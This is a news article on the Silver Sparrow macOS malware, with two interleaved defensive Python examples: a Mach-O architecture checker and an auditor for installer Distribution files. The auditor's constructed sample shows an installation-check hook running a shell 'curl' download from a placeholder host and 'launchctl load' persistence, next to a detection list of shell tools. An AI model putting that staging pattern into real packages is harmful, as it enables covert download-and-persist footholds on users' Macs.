Mysterious malware infecting Apple Silicon Macs has no payload yet

More malware has been discovered affecting Apple Silicon Macs, but researchers have found that, at this point, it carries no malicious payload at all.

It appears there may be more malware targeting Apple's M1-based Macs than previously thought. Following initial reports of the first M1 malware found in the wild, further infections have come to light, though of a particularly toothless variety.

In early February, Red Canary researchers discovered a strain of macOS malware that uses a LaunchAgent to persist on the system, much like other macOS malware. What caught the researchers' attention was that it behaved differently from typical adware: it relied on JavaScript, run by the macOS Installer, to execute its commands.

The malware cluster, dubbed “Silver Sparrow” by the researchers, also included a binary file built to work with M1 chips. This made it malware that could potentially target Apple Silicon Macs.

Further research by VMware Carbon Black and Malwarebytes found that Silver Sparrow was likely a "previously undetected malware species". As of February 17, it had been detected on 29,139 macOS endpoints across 153 countries, with the majority of infections in the US, UK, Canada, France, and Germany.

At the time of publication, the malware had not been used to deliver a malicious payload to victims' Macs, although that may change in the future. Given its M1 compatibility, its "relatively high infection rate" and its operational maturity, the researchers considered it a serious enough threat, one "uniquely positioned to deliver a potentially impactful payload in the blink of an eye", according to the disclosure.

Two versions of the malware were discovered. One version's payload was a binary compiled only for Intel-based Macs, while the other was a universal binary compiled for both Intel and M1 architectures. The payload appears to be a placeholder: the first version opens a window that literally says "Hello, world!" and the second says "You did it!"

An example of the included binary file [via Red Canary]

Had the binary carried a real payload, shipping it as a universal binary would have let the same or similar payload run natively on both architectures from a single executable.
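To see which of the two variants described above you are holding, a triager usually runs `file` or `lipo -archs` on the binary. The following is an added example, not code from the article or from Red Canary, that does the same check in Python by reading the Mach-O headers directly: it parses a universal ("fat") header, cross-checks each slice against its own thin header, and reports whether an arm64 slice is present. The two sample files at the bottom are constructed in-memory headers (no executable code), built to mirror the Intel-only and Intel+M1 shapes the article describes; the magic numbers and cputype constants are Apple's from `<mach-o/loader.h>` and `<mach-o/fat.h>`, and the 20-slice plausibility cap is this example's own heuristic.

```python
import struct

# Magic numbers from <mach-o/loader.h> and <mach-o/fat.h>.
FAT_MAGIC = 0xCAFEBABE       # universal header, big-endian, 32-bit offsets
FAT_MAGIC_64 = 0xCAFEBABF    # universal header, big-endian, 64-bit offsets
MH_MAGIC = 0xFEEDFACE        # thin 32-bit Mach-O (host-endian: little on x86 and arm)
MH_MAGIC_64 = 0xFEEDFACF     # thin 64-bit Mach-O
CPU_ARCH_ABI64 = 0x01000000
CPU_TYPE_X86 = 7
CPU_TYPE_ARM = 12
CPU_TYPE_X86_64 = CPU_TYPE_X86 | CPU_ARCH_ABI64
CPU_TYPE_ARM64 = CPU_TYPE_ARM | CPU_ARCH_ABI64
CPU_NAMES = {CPU_TYPE_X86: "i386", CPU_TYPE_X86_64: "x86_64",
             CPU_TYPE_ARM: "arm", CPU_TYPE_ARM64: "arm64"}


def cpu_name(cputype):
    return CPU_NAMES.get(cputype, "cputype_0x%x" % (cputype & 0xFFFFFFFF))


def thin_cputype(data):
    """cputype of a thin Mach-O header, or None if 'data' does not start with one."""
    if len(data) < 8:
        return None
    magic, cputype = struct.unpack("<Ii", data[:8])
    return cputype if magic in (MH_MAGIC, MH_MAGIC_64) else None


def mach_o_archs(data):
    """List the architectures a Mach-O file (thin or universal) runs on natively."""
    if len(data) < 8:
        raise ValueError("too short to be Mach-O")
    magic, count = struct.unpack(">II", data[:8])
    if magic in (FAT_MAGIC, FAT_MAGIC_64):
        # Java .class files share 0xCAFEBABE; their version field lands here and is
        # far larger than any plausible slice count, so reject absurd values (heuristic).
        if count == 0 or count > 20:
            raise ValueError("implausible fat_arch count %d" % count)
        fmt = ">iiIII" if magic == FAT_MAGIC else ">iiQQII"   # fat_arch / fat_arch_64
        entry = struct.calcsize(fmt)
        archs = []
        for i in range(count):
            start = 8 + i * entry
            if len(data) < start + entry:
                raise ValueError("truncated fat header")
            fields = struct.unpack(fmt, data[start:start + entry])
            cputype, offset, size = fields[0], fields[2], fields[3]
            if offset + size > len(data):
                raise ValueError("slice %d runs past end of file" % i)
            # Cross-check: the slice's own header must agree with the fat entry.
            if thin_cputype(data[offset:offset + size]) != cputype:
                raise ValueError("slice %d header disagrees with fat entry" % i)
            archs.append(cpu_name(cputype))
        return archs
    cputype = thin_cputype(data)
    if cputype is None:
        raise ValueError("not a Mach-O or universal binary")
    return [cpu_name(cputype)]


def runs_natively_on_apple_silicon(data):
    return "arm64" in mach_o_archs(data)


# --- constructed sample files (headers only, no code, so nothing can execute) ---
def _mach_header_64(cputype, cpusubtype):
    # magic, cputype, cpusubtype, filetype (MH_EXECUTE = 2), ncmds, sizeofcmds, flags, reserved
    return struct.pack("<IiiIIIII", MH_MAGIC_64, cputype, cpusubtype, 2, 0, 0, 0, 0)


def _universal(slices):
    header_len = 8 + 20 * len(slices)
    entries, body = b"", b""
    for cputype, cpusubtype in slices:
        blob = _mach_header_64(cputype, cpusubtype)
        entries += struct.pack(">iiIII", cputype, cpusubtype, header_len + len(body), len(blob), 0)
        body += blob
    return struct.pack(">II", FAT_MAGIC, len(slices)) + entries + body


SAMPLE_INTEL_ONLY = _mach_header_64(CPU_TYPE_X86_64, 3)                      # shape of variant one
SAMPLE_UNIVERSAL = _universal([(CPU_TYPE_X86_64, 3), (CPU_TYPE_ARM64, 0)])   # shape of variant two

if __name__ == "__main__":
    for name, blob in (("intel-only", SAMPLE_INTEL_ONLY), ("universal", SAMPLE_UNIVERSAL)):
        print(name, mach_o_archs(blob), "native on M1:", runs_natively_on_apple_silicon(blob))
```

On a real sample, pass `open(path, "rb").read()` to `mach_o_archs`; a slice whose own header disagrees with the fat entry is a sign of a corrupt or deliberately confusing file and is worth a closer look rather than a silent skip.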

The infection was delivered through files named "update.pkg" and "updater.pkg", posing as installers. They use the macOS Installer JavaScript API to run the suspicious commands.

This is a behaviour occasionally seen in legitimate software but not in other macOS malware, which usually relies on pre-install or post-install scripts to execute commands.
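The Installer JavaScript API lives in a package's Distribution XML: hooks such as `installation-check` and `volume-check` name a JavaScript function that Installer evaluates before the user even clicks Install, and `system.run()` inside that function executes an arbitrary binary. The following is an added example, not code from the article or from Red Canary, that audits a Distribution file for exactly this pattern. Both Distribution files below are constructed samples loosely modelled on the behaviour the article describes, not the real Silver Sparrow files; the hostnames, paths and bundle identifiers in them are placeholders, and the list of "shell hints" is this example's own triage heuristic.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: a Distribution file that runs shell commands from an
# installation-check hook (not the real Silver Sparrow Distribution file).
SUSPICIOUS_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="2">
  <title>Updater</title>
  <installation-check script="installationCheck()"/>
  <script><![CDATA[
  function installationCheck() {
    var home = system.env.HOME;
    system.run('/bin/sh', '-c', 'mkdir -p ' + home + '/Library/Application Support/updater');
    system.run('/bin/sh', '-c', 'curl -s https://example.invalid/version.plist -o ' + home + '/Library/Application Support/updater/version.plist');
    system.run('/bin/sh', '-c', 'launchctl load ' + home + '/Library/LaunchAgents/updater.plist');
    return true;
  }
  ]]></script>
  <choices-outline><line choice="default"/></choices-outline>
  <choice id="default" title="Updater"><pkg-ref id="com.example.updater"/></choice>
  <pkg-ref id="com.example.updater">updater.pkg</pkg-ref>
</installer-gui-script>
"""

# Constructed sample: the legitimate use of the same API, a version gate that
# never leaves the Installer's JavaScript sandbox.
BENIGN_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="2">
  <title>Widget</title>
  <volume-check script="volCheck()"/>
  <script><![CDATA[
  function volCheck() {
    if (system.compareVersions(my.target.systemVersion.ProductVersion, '10.13') < 0) {
      my.result.title = 'Unsupported macOS';
      my.result.message = 'This package requires macOS 10.13 or later.';
      my.result.type = 'Fatal';
      return false;
    }
    return true;
  }
  ]]></script>
  <choices-outline><line choice="default"/></choices-outline>
  <choice id="default" title="Widget"><pkg-ref id="com.example.widget"/></choice>
  <pkg-ref id="com.example.widget">widget.pkg</pkg-ref>
</installer-gui-script>
"""

HOOK_ELEMENTS = ("installation-check", "volume-check")
# system.run() and system.runOnce() are the Installer JS calls that execute a binary.
RUN_CALL = re.compile(r"system\.run(?:Once)?\s*\(([^)]*)\)", re.S)
# Heuristic: argument substrings that turn "runs a binary" into "stages a foothold".
SHELL_HINTS = ("/bin/sh", "/bin/bash", "/bin/zsh", "curl", "osascript", "launchctl", "chmod")


def audit_distribution(xml_text):
    """Report the JS hooks and system.run() calls declared in a Distribution file."""
    root = ET.fromstring(xml_text)
    findings = {"hooks": [], "run_calls": [], "shell_hints": []}
    # Hook elements whose 'script' attribute names JS evaluated before the payload is unpacked.
    for tag in HOOK_ELEMENTS:
        for el in root.iter(tag):
            if el.get("script"):
                findings["hooks"].append((tag, el.get("script")))
    # Scan every <script> body, whichever hook or choice attribute references it.
    js = "\n".join(s.text or "" for s in root.iter("script"))
    for m in RUN_CALL.finditer(js):
        args = " ".join(m.group(1).split())   # collapse whitespace for reporting
        findings["run_calls"].append(args)
        for hint in SHELL_HINTS:
            if hint in args and hint not in findings["shell_hints"]:
                findings["shell_hints"].append(hint)
    # Any system.run() deserves a look; a shell plus curl/launchctl is the
    # download-and-persist pattern the article describes, so escalate that.
    if findings["run_calls"] and findings["shell_hints"]:
        findings["verdict"] = "suspicious"
    elif findings["run_calls"]:
        findings["verdict"] = "review"
    else:
        findings["verdict"] = "ok"
    return findings


if __name__ == "__main__":
    for name, dist in (("updater", SUSPICIOUS_DISTRIBUTION), ("widget", BENIGN_DISTRIBUTION)):
        r = audit_distribution(dist)
        print(name, r["verdict"], r["hooks"], r["shell_hints"])
```

To get the Distribution file out of a real flat package, expand it first (`pkgutil --expand update.pkg out/` or `xar -xf update.pkg Distribution`) and feed the resulting `Distribution` text to `audit_distribution`. Note what the check does not cover: a pre-install or post-install script inside a component package's `Scripts` archive is a separate artifact and needs its own review.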

Once installed, the infection checks a specific URL for a downloadable file, which could contain further instructions or a final payload. After a week of monitoring the malware, no final payload had appeared, though that could change in the future.

Several questions remain unanswered for the researchers about Silver Sparrow. These include how the original PKG files reached the systems they infected, and what to make of elements of the malware's code that appear to belong to a wider toolset.

"The ultimate goal of this malware is a mystery," admits Red Canary. "We cannot know with certainty which payload is being distributed by the malware, whether a payload has already been delivered and removed, or whether the adversary has a future timeline for distribution."

There is also the question of why the "Hello World" executables were included at all, since the binary does not run automatically; a victim would have to seek it out and launch it themselves. The executables suggest either that this is malware still under development, or that an application bundle was needed to make the package look legitimate to other parties.
